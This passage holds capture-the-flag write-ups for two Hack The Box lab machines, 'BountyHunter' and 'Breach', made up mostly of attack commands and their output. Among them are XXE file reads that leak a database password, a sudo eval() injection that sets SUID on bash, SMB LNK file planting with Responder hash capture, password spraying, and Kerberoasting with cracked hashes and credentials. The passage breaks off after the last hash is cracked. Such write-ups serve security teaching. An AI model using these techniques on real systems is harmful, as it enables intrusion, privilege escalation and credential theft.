[--------------------] - 0s         0/30000   -       http://10.129.95.166/js/scripts.js

Since it’s based PHP let me specify -x PHP.

┌──(kali㉿kali)-[~]
└─$ sudo feroxbuster -u http://10.129.95.166/ -x php --filter-status 404
                                                                                                                                                                                                   
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.129.95.166/
 🚩  In-Scope Url          │ 10.129.95.166
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 💢  Status Code Filters   │ [404]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      278c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      311c http://10.129.95.166/js => http://10.129.95.166/js/
301      GET        9l       28w      312c http://10.129.95.166/css => http://10.129.95.166/css/
200      GET       64l      232w     2682c http://10.129.95.166/resources/lato.css
200      GET        5l       15w      125c http://10.129.95.166/portal.php
200      GET        1l       44w     2532c http://10.129.95.166/resources/jquery.easing.min.js
200      GET       80l      248w     3228c http://10.129.95.166/resources/monsterat.css
200      GET       69l      210w     2424c http://10.129.95.166/js/scripts.js
200      GET      248l      761w    12807c http://10.129.95.166/assets/img/avataaars.svg
200      GET      122l      415w    30702c http://10.129.95.166/assets/img/portfolio/cake.png
200      GET      150l      506w    43607c http://10.129.95.166/assets/img/portfolio/submarine.png
200      GET      139l      444w    35267c http://10.129.95.166/assets/img/portfolio/safe.png
200      GET        8l       29w    28898c http://10.129.95.166/assets/img/favicon.ico
200      GET      178l      601w    46744c http://10.129.95.166/assets/img/portfolio/game.png
301      GET        9l       28w      315c http://10.129.95.166/assets => http://10.129.95.166/assets/
200      GET       24l       44w      594c http://10.129.95.166/resources/bountylog.js
200      GET        6l       34w      210c http://10.129.95.166/resources/README.txt
200      GET      195l      683w    66699c http://10.129.95.166/assets/img/portfolio/cabin.png
200      GET      151l      616w    50204c http://10.129.95.166/assets/img/portfolio/circus.png
200      GET        0l        0w        0c http://10.129.95.166/db.php
200      GET        7l      567w    48945c http://10.129.95.166/resources/bootstrap_login.min.js
200      GET        7l     1031w    84152c http://10.129.95.166/resources/bootstrap.bundle.min.js
200      GET        2l     1297w    89476c http://10.129.95.166/resources/jquery.min.js
200      GET        4l     1298w    86659c http://10.129.95.166/resources/jquery_login.min.js
200      GET      388l     1470w    25169c http://10.129.95.166/index.php
200      GET    10240l    19373w   187375c http://10.129.95.166/css/styles.css
200      GET       20l       63w      617c http://10.129.95.166/log_submit.php
301      GET        9l       28w      318c http://10.129.95.166/resources => http://10.129.95.166/resources/
200      GET        5l   108280w  1194961c http://10.129.95.166/resources/all.js
200      GET      388l     1470w    25169c http://10.129.95.166/
[>-------------------] - 15s     5446/240094  11m     found:29      errors:52     
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_10_129_95_166_-1775112934.state ...
[>-------------------] - 15s     5527/240094  11m     found:29      errors:52     
[>-------------------] - 15s     1694/60000   116/s   http://10.129.95.166/ 
[>-------------------] - 12s     1396/60000   116/s   http://10.129.95.166/js/ 
[>-------------------] - 12s     1552/60000   129/s   http://10.129.95.166/css/ 
[####################] - 7s     60000/60000   8191/s  http://10.129.95.166/resources/ => Directory listing (add --scan-dir-listings to scan)
[>-------------------] - 11s      748/60000   67/s    http://10.129.95.166/assets/ 
[--------------------] - 0s         0/60000   -       http://10.129.95.166/resources/lato.css

BurpSuite for XXE Discovery

So looking at the request, we actually found out that’s its giving POST request as base64 encoded XML format.

Leading to potential XXE to me.

Here:

For simpler and time saving, here’s the final Payload for simple reading the /etc/passwd file from XXE vuln:

(Substack FLAGGED my XML)

Which we will needed to double protect it: Base64 encode + URL encode.

Base64 Encode
URL Encoding

And become:

And:

Dope!

XXE For Retrieve Internal Information

Still with the same principal, and based on information from dp.php folder we found from Feroxbuster earlier.

db.php:

Now our Payload is shifted to:

And we try it again on Burp:

Perfect, we got our encoded content inside, let’s decoded it:

┌──(kali㉿kali)-[~]
└─$ echo "PD9waHAKLy8gVE9ETyAtPiBJbXBsZW1lbnQgbG9naW4gc3lzdGVtIHdpdGggdGhlIGRhdGFiYXNlLgokZGJzZXJ2ZXIgPSAibG9jYWxob3N0IjsKJGRibmFtZSA9ICJib3VudHkiOwokZGJ1c2VybmFtZSA9ICJhZG1pbiI7CiRkYnBhc3N3b3JkID0gIm0xOVJvQVUwaFA0MUExc1RzcTZLIjsKJHRlc3R1c2VyID0gInRlc3QiOwo/Pgo=" | base64 -d
 Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>

And based on the /etc/passwd we can try several users, and finally found a match of:

┌──(kali㉿kali)-[~]
└─$ sudo netexec ssh 10.129.95.166 -u development -p m19RoAU0hP41A1sTsq6K
SSH         10.129.95.166   22     10.129.95.166    [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.2
SSH         10.129.95.166   22     10.129.95.166    [+] development:m19RoAU0hP41A1sTsq6K (Pwn3d!) Linux - Shell access!

And we found a pair:

user: development
passwd: m19RoAU0hP41A1sTsq6K

Btw! we got credentials. . .

Let’s BloodPengu.

BloodPengu Attack Paths

With credentials let’s use BloodPengu-Python:

Collect All
Collect Kernel and LPE

┌──(root㉿kali)-[/]
└─# bloodpengu-python 10.129.95.166 -u development -p m19RoAU0hP41A1sTsq6K -o out.json

         _  __        ___  __             _____                                
   ___ _| |/_/_______/ _ )/ /__  ___  ___/ / _ \___ ___  ___ ___ __  ___  __ __
  / _ `/>  
  Data collector in Python for BloodPengu APM

  ----------------------------------------------------------------------

  [*]  Target  : 10.129.95.166:22
  [*]  User    : development
  [*]  Auth    : password
  [*]  Mode    : full collection
  [*]  Output  : out.json

  [*]  Connecting to 10.129.95.166:22...
  [+]  Connected in 1.85s  -  development@10.129.95.166:22
  [+]  Remote  : Linux bountyhunter 5.4.0-80-generic #90-Ubuntu SMP Fri Jul 9 22:49:44 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

  ----------------------------------------------------------------------

  [*]  Collecting users and groups...
. . .[SNIP]. . .
  [POTENTIAL]  10

  [~]  Total findings  :  67
  [~]  Graph nodes     :  319
  [~]  Graph edges     :  97
  [~]  Output file     :  out.json

  [+]  Import out.json into BloodPengu via Import JSON

  ----------------------------------------------------------------------

  gxc-BloodPengu.py v1.5.8 by <@byt3n33dl3>

┌──(root㉿kali)-[/]
└─# bloodpengu-python 10.129.95.166 -u development -p m19RoAU0hP41A1sTsq6K -M kernel -o kernel_out.json 

         _  __        ___  __             _____                                
   ___ _| |/_/_______/ _ )/ /__  ___  ___/ / _ \___ ___  ___ ___ __  ___  __ __
  / _ `/>  
  Data collector in Python for BloodPengu APM

  ----------------------------------------------------------------------

  [*]  Target  : 10.129.95.166:22
  [*]  User    : development
  [*]  Auth    : password
  [*]  Mode    : kernel
  [*]  Output  : kernel_out.json

  [*]  Connecting to 10.129.95.166:22...
  [+]  Connected in 1.89s  -  development@10.129.95.166:22
  [+]  Remote  : Linux bountyhunter 5.4.0-80-generic #90-Ubuntu SMP Fri Jul 9 22:49:44 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

  ----------------------------------------------------------------------

  [*]  Collecting users and groups...
  [+]  Users: 34  |  Groups: 60
  [*]  Collecting privileged group memberships...
  [+]  Groups: development
  [*]  Running kernel and LPE full checklist...
  [HIGH    ]  kernel          CVE-2021-4034  |  Polkit pkexec privilege escalation  |  kernel 5.4.0-80-generic
. . .[SNIP]. . .
  [HIGH     ]  13
  [POTENTIAL]  6

  [~]  Total findings  :  23
  [~]  Graph nodes     :  94
  [~]  Graph edges     :  10
  [~]  Output file     :  kernel_out.json

  [+]  Import kernel_out.json into BloodPengu via Import JSON

  ----------------------------------------------------------------------

  gxc-BloodPengu.py v1.5.8 by <@byt3n33dl3>

We have several:

But I think the most accurate would be the sudo misconfig

It’s a custom script:

Let’s see if it’s abuse-able and can lead to escalation.

Abusing eval() on user-controlled for PrivEsc

Let’s logon first!

┌──(kali㉿kali)-[~]
└─$ sudo netexec ssh 10.129.95.166 -u development -p m19RoAU0hP41A1sTsq6K
SSH         10.129.95.166   22     10.129.95.166    [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.2
SSH         10.129.95.166   22     10.129.95.166    [+] development:m19RoAU0hP41A1sTsq6K (Pwn3d!) Linux - Shell access!

┌──(kali㉿kali)-[~]
└─$ sudo ssh development@10.129.95.166
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
development@10.129.95.166's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 02 Apr 2026 07:20:25 AM UTC

  System load:           0.06
  Usage of /:            23.7% of 6.83GB
  Memory usage:          23%
  Swap usage:            0%
  Processes:             215
  Users logged in:       0
  IPv4 address for eth0: 10.129.95.166
  IPv6 address for eth0: dead:beef::250:56ff:feb0:3ad4


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Apr  2 07:20:18 2026 from 10.10.15.169
development@bountyhunter:~$ id
uid=1000(development) gid=1000(development) groups=1000(development)

This is about the script:

development@bountyhunter:~$ sudo /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
Please enter the path to the ticket file.
/root
Wrong file type.
development@bountyhunter:~$ cat /opt/skytrain_inc/ticketValidator.py
#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.

def load_file(loc):
    if loc.endswith(".md"):
        return open(loc, 'r')
    else:
        print("Wrong file type.")
        exit()

def evaluate(ticketFile):
    #Evaluates a ticket to check for ireggularities.
    code_line = None
    for i,x in enumerate(ticketFile.readlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
            continue

        if x.startswith("__Ticket Code:__"):
            code_line = i+1
            continue

        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            ticketCode = x.replace("**", "").split("+")[0]
            if int(ticketCode) % 7 == 4:
                validationNumber = eval(x.replace("**", ""))
                if validationNumber > 100:
                    return True
                else:
                    return False
    return False

def main():
    fileName = input("Please enter the path to the ticket file.\n")
    ticket = load_file(fileName)
    #DEBUG print(ticket)
    result = evaluate(ticket)
    if (result):
        print("Valid ticket.")
    else:
        print("Invalid ticket.")
    ticket.close

main()
development@bountyhunter:~$

So based on here, it’s clear that eval() on user-controlled input. The way i will abuses it is to create this MD file on /tmp:

development@bountyhunter:~$ vi /tmp/evil.md
development@bountyhunter:~$ cat /tmp/evil.md 
# Skytrain Inc
## Ticket to pwn
__Ticket Code:__
**11+__import__('os').system('chmod +s /bin/bash')**
development@bountyhunter:~$ sudo /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
Please enter the path to the ticket file.
/tmp/evil.md
Destination: pwn
Invalid ticket.
development@bountyhunter:~$

That’s it:

development@bountyhunter:~$ bash -p
bash-5.0#

Then just run bash!

labs.hackthebox.com/achievement/machine/2489228/359

Until next time and Happy Hacking!

HTB Breach - Windows (Medium)

Sulaiman — Wed, 01 Apr 2026 15:28:15 GMT

HTB Breach

From HTB:

Breach is a medium difficulty Windows machine, where guest access to an SMB share is available. By leveraging write permissions on that SMB share, NTLMv2 hashes of a domain user are captured to obtain valid credentials.

With access as a low-privileged domain user, a kerberoastable service account (svc_mssql) is revealed. After getting access to the service account, a Silver Ticket attack is performed to impersonate the Administrator user and gain access to Microsoft SQL Server.

Through the xp_cmdshell feature, remote code execution is achieved as the svc_mssql service account. Finally, privilege escalation is performed by abusing the SeImpersonatePrivilege privilege.

Network Enumeration and Port Discovery

┌──(kali㉿kali)-[~]
└─$ ping -c2 10.129.11.224   
PING 10.129.11.224 (10.129.11.224) 56(84) bytes of data.
64 bytes from 10.129.11.224: icmp_seq=1 ttl=127 time=250 ms
64 bytes from 10.129.11.224: icmp_seq=2 ttl=127 time=261 ms

--- 10.129.11.224 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 249.887/255.255/260.624/5.368 ms

Continue with NMAP Scanning

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -p- --min-rate 8000 10.129.11.224 -oA nmap/nmap                                   
Starting Nmap 7.98 ( https://nmap.org ) at
Nmap scan report for BREACHDC (10.129.11.224)
Host is up (0.25s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49667/tcp open  unknown
49677/tcp open  unknown
50023/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -p53,80,88,135,139,389,445,464,593,636,1433,3268-3269,3389,5985,9389 -sC -sV 10.129.11.224 -oA nmap/nmap-ports
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-01 10:03 -0400
Nmap scan report for BREACHDC (10.129.11.224)
Host is up (0.25s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-04-01 14:03:26Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.129.11.224:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2026-04-01T14:04:26+00:00; +6s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-04-01T13:55:44
|_Not valid after:  2056-04-01T13:55:44
| ms-sql-ntlm-info: 
|   10.129.11.224:1433: 
|     Target_Name: BREACH
|     NetBIOS_Domain_Name: BREACH
|     NetBIOS_Computer_Name: BREACHDC
|     DNS_Domain_Name: breach.vl
|     DNS_Computer_Name: BREACHDC.breach.vl
|     DNS_Tree_Name: breach.vl
|_    Product_Version: 10.0.20348
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-04-01T14:04:26+00:00; +6s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: BREACH
|   NetBIOS_Domain_Name: BREACH
|   NetBIOS_Computer_Name: BREACHDC
|   DNS_Domain_Name: breach.vl
|   DNS_Computer_Name: BREACHDC.breach.vl
|   DNS_Tree_Name: breach.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2026-04-01T14:03:47+00:00
| ssl-cert: Subject: commonName=BREACHDC.breach.vl
| Not valid before: 2026-03-31T13:52:57
|_Not valid after:  2026-09-30T13:52:57
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 
|_  start_date: N/A
|_clock-skew: mean: 5s, deviation: 0s, median: 5s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in seconds

From here we’ve exposed to many port options, including HTTP and MSSQL which is would be nice to check.

And we even got hostsname:

BREACHDC.breach.vl
BREACHDC
breach.vl

Make that local and continue.

PS: There’s nothing here so I skipped the Web and abuse the Active Directory misconfigured shares on SMB.

SMB Shares Enumeration and Attack

From the SMB I discover that the “Guest“ account are abuse-able, meaning I can reach so RID and get all local user with it, and Guest account have non-password SMB “WRITE“ access so that’s dope, leaving options of poisoning and get NTLMv2 hash.

Summary:

RID leading to User enumeration
Non-password protected WRITE access

┌──(kali㉿kali)-[~]
└─$ sudo netexec smb breachdc.breach.vl -u guest -p '' --rid-brute 1200 | awk -F'\\\\' '/SidTypeUser/ { split($2,a," "); print a[1] }' | sort -u
Administrator
BREACHDC$
Christine.Bruce
Claire.Pope
Diana.Pope
George.Williams
Guest
Hilary.Reed
Hugh.Watts
Jasmine.Price
Jasmine.Slater
Julia.Wong
krbtgt
Lawrence.Kaur
svc_mssql

Sadly none of this User are roastable with AS-REP.

┌──(kali㉿kali)-[~]
└─$ sudo netexec smb breachdc.breach.vl -u guest -p '' --users --shares                                                                         
SMB         10.129.11.224   445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.11.224   445    BREACHDC         [+] breach.vl\guest: 
SMB         10.129.11.224   445    BREACHDC         [*] Enumerated shares
SMB         10.129.11.224   445    BREACHDC         Share           Permissions     Remark
SMB         10.129.11.224   445    BREACHDC         -----           -----------     ------
SMB         10.129.11.224   445    BREACHDC         ADMIN$                          Remote Admin
SMB         10.129.11.224   445    BREACHDC         C$                              Default share
SMB         10.129.11.224   445    BREACHDC         IPC$            READ            Remote IPC
SMB         10.129.11.224   445    BREACHDC         NETLOGON                        Logon server share 
SMB         10.129.11.224   445    BREACHDC         share           READ,WRITE      
SMB         10.129.11.224   445    BREACHDC         SYSVOL                          Logon server share 
SMB         10.129.11.224   445    BREACHDC         Users           READ

Further-more I deeply enumerate the SMB shares that we have WRITE Access on it.

And discover many users:

. . .[SNIP]. . .
smb: \software\> cd ..
smb: \> cd transfer\
smb: \transfer\> ls
  .                                   D        0  Mon Sep  8 06:13:44 2025
  ..                                  D        0  Wed Apr  1 10:00:05 2026
  claire.pope                         D        0  Thu Feb 17 06:21:35 2022
  diana.pope                          D        0  Thu Feb 17 06:21:19 2022
  julia.wong                          D        0  Wed Apr 16 20:38:12 2025

                7863807 blocks of size 4096. 1550174 blocks available
smb: \transfer\> cd julia.wong\

This is would be the place I poison and abuse the WRITE Access with Only NetExec and Responder.

Gain NetNTLMv2 Hashes

netexec smb breachdc.breach.vl -u guest -p ‘‘ -M slinky -o SERVER=10.10.15.169 NAME=”transfer\test” SHARES=”share”

┌──(kali㉿kali)-[~]
└─$ sudo netexec smb breachdc.breach.vl -u guest -p '' -M slinky -o SERVER=10.10.15.169 NAME="transfer\test" SHARES="share"
SMB         10.129.11.224   445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.11.224   445    BREACHDC         [+] breach.vl\guest: 
SMB         10.129.11.224   445    BREACHDC         [*] Enumerated shares
SMB         10.129.11.224   445    BREACHDC         Share           Permissions     Remark
SMB         10.129.11.224   445    BREACHDC         -----           -----------     ------
SMB         10.129.11.224   445    BREACHDC         ADMIN$                          Remote Admin
SMB         10.129.11.224   445    BREACHDC         C$                              Default share
SMB         10.129.11.224   445    BREACHDC         IPC$            READ            Remote IPC
SMB         10.129.11.224   445    BREACHDC         NETLOGON                        Logon server share 
SMB         10.129.11.224   445    BREACHDC         share           READ,WRITE      
SMB         10.129.11.224   445    BREACHDC         SYSVOL                          Logon server share 
SMB         10.129.11.224   445    BREACHDC         Users           READ            
SLINKY      10.129.11.224   445    BREACHDC         [+] Found writable share: share
SLINKY      10.129.11.224   445    BREACHDC         [+] Created LNK file on the share share

Let’s look at Responder:

┌──(kali㉿kali)-[~]
└─$ sudo responder -Q -I tun0 -wd
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|


[*] Tips jar:
    USDT -> 0xCc98c1D3b8cd9b717b5257827102940e4E17A19A
    BTC  -> bc1q9360jedhhmps5vpl3u05vyg4jryrl52dmazz49

[+] Poisoners:
    LLMNR                      [ON]
. . .[SNIP]. . .

[*] Version: Responder 3.2.2.0
[*] Author: Laurent Gaffie, 

[+] Listening for events...                                                                                                                                                                        

[+] Responder is in quiet mode. No NBT-NS, LLMNR, MDNS messages will print to screen.
[SMB] NTLMv2-SSP Client   : 10.129.11.224
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:57938d5367ce78b4:150F23F1C3EA113DAF2B1C7C47E943E0:01010000000000000021D4D8BEC1DC017F31EE16A824567F0000000002000800340057005400320001001E00570049004E002D004900490051003000350038004E00420033003500500004003400570049004E002D004900490051003000350038004E0042003300350050002E0034005700540032002E004C004F00430041004C000300140034005700540032002E004C004F00430041004C000500140034005700540032002E004C004F00430041004C00070008000021D4D8BEC1DC01060004000200000008003000300000000000000001000000002000009BFCDEA7BC40FA6A22BFFEDBC3285B570D336AECD2AEEE001B4651691FD7DEFE0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310035002E003100360039000000000000000000                                                   
[*] Skipping previously captured hash for BREACH\Julia.Wong
[*] Skipping previously captured hash for BREACH\Julia.Wong
[*] Skipping previously captured hash for BREACH\Julia.Wong
[*] Skipping previously captured hash for BREACH\Julia.Wong

That’s dope, we got the NTLMv2 hash.

Let’s crack it:

┌──(kali㉿kali)-[~]
└─$ john netntv2.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Computer1        (Julia.Wong)     
1g 0:00:00:00 DONE (2026-04-01 10:07) 12.50g/s 1510Kp/s 1510Kc/s 1510KC/s bratz1234..042602
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

And we found a pair of:

user: Julia.Wong
passwd: Computer1

With no-password reuse case.

┌──(kali㉿kali)-[~]
└─$ sudo netexec ldap breachdc.breach.vl -u users.txt -p Computer1 --continue-on-success                 
LDAP        10.129.11.224   389    BREACHDC         [*] Windows Server 2022 Build 20348 (name:BREACHDC) (domain:breach.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\Administrator:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\BREACHDC$:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\Christine.Bruce:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\Claire.Pope:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\Diana.Pope:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\George.Williams:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\Guest:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\Hilary.Reed:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\Hugh.Watts:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\Jasmine.Price:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\Jasmine.Slater:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [+] breach.vl\Julia.Wong:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\krbtgt:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\Lawrence.Kaur:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\svc_mssql:Computer1

Active Directory Kerberoasting

Let’s use Julia.Wong credential to find potential Kerberos Attack.

┌──(kali㉿kali)-[~]
└─$ sudo netexec ldap breachdc.breach.vl -u Julia.Wong -p Computer1 -k --kerberoasting out.hash
LDAP        breachdc.breach.vl 389    BREACHDC         [*] Windows Server 2022 Build 20348 (name:BREACHDC) (domain:breach.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        breachdc.breach.vl 389    BREACHDC         [+] breach.vl\Julia.Wong:Computer1 
LDAP        breachdc.breach.vl 389    BREACHDC         [*] Skipping disabled account: krbtgt
LDAP        breachdc.breach.vl 389    BREACHDC         [*] Total of records returned 1
LDAP        breachdc.breach.vl 389    BREACHDC         [*] sAMAccountName: svc_mssql, memberOf: [], pwdLastSet: 2022-02-17 05:43:08.106169, lastLogon: 2026-04-01 09:55:41.083799
LDAP        breachdc.breach.vl 389    BREACHDC         $krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl\svc_mssql*$9a35ce31a30069e869ce4cc95a25b7f9$48f1073ae7bea84d60ee0dfb5c48c6f05fd2c818f6b2aa57d12f927bd291527b79f1a93cf330033f169e068370b41da23023bc84c61234c935fbf567446a18cb00bcb3eb9e423cbb070aa5888cbf306a18bff5bab0dbd33dbba39379f2e77b3380bf0ea656d6103e4d918c9438049eb264de33620a31c3407551548de5d846320070a3fd8d48cdb3af0ba6d0cea9d957b237a07ec7322418af1ea96446ca89b258e876b4762c2bcac1f87f5676aa0623c03fc6e43e36d1fc14f22c6da157be16c29c7e1c089c6584db8e7ebad29ad7c3ddd859f82a55faefc796603bac6fc7e54f69427a78b91f742b907d4c80fbcb87ee93a5037d66d514c12fe70618b5a12c988efe41fc30e03912f6bd8e624b19bbde53e56ca20fa55877052cc73161d6ea5b821c01257209529f40bfe96d2944b6b71803bc66f6662b24db8c8a64b03b5a924e747b7ab2742150e03664d3e3273f0495ad48d2fdff1f9e110e79966f0e9e9e172aee19c860d688aec1823f7325500c1a2058d9eddb342a0e2f57be1c08ec3e7ae42f1c4a54a46772211cbb051070fd5f2eb208916f08ef2538ec59fea695d61104040aef5a5df18b31fcff78f6a165a150f6206ee4776c72d95938937b2eb6ddd5b1fabc27aceabb5a05c35e42e08609b6e0b984f7d61fedc520741612b3c1b2e706300167d34c77eb7c9d382798b11295a390309694930731b4b81c2c4a55cabb80f3afddbe6242defe7a4e7024c9a6ee4ddaadfed02bc28f818b4ac9f53791b59a3e27515341ec12f7d22d7f0acc1d7266005dcf3c55bbc426a0d0f54c9f81baf366a49be2d63d945068608c324aef2014f2623c4e6943fcb8657f9cb604334dc0328acc6ee181c60acd103112b8461cede0b29c3e83c7fe013e10cdfc8d63e66e5fc9313d0f740fb5b3c5788757c3c32c71ec49072401855328642a66392f64d51731618d63eba318c0aaec109ce5edaf930038a6433f12b771101daee7eac80418686df441af88255ce920562d3956fb07403435453fa6176a90c500a94b621298cf9c295f27cd2e14d2840dea3d88698ec37ec2f04f71e24427c67a4207885b2929342b167425ae7be163b784f06b7075e0951913c3a0e4b31008825c254db90cd7be723658ce1c5086fe48adeb4bd921ef229a4083c165bc0c6673c44f4621331ef2fbbc3458258e9a58a7cae64c904e212f7feff46d477063d16043ce3127d9abb77a874cebefb32503f10be4fe4f3006757560a9802f78a3ec3b7cf8f095d76ddf67c337f409c7ae69c9dcf563270ba2f3741a310ce2ace5f939b211d9277529685402c1c2b6e7fe28b93644ce1891ae94a1b8e30dce95a3b0f0f982798cce72f0cb7de38d641a322fc3b65f39feeb9d7a10a028775bded0c1164eda3e3723d45d4986f4d7afe53905b03590ac81bfdcff20bcfb9aaa5ba7c38601aaa42a9b4c3b8eec1c01ba70558f90df472faa

We got one, it belongs to SVC_MSSQL:

┌──(kali㉿kali)-[~]
└─$ john out.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Trustno1         (?)     
1g 0:00:00:00 DONE (2026-04-01 10:08) 11.11g/s 580266p/s 580266c/s 580266C/s chloelouise..lili12
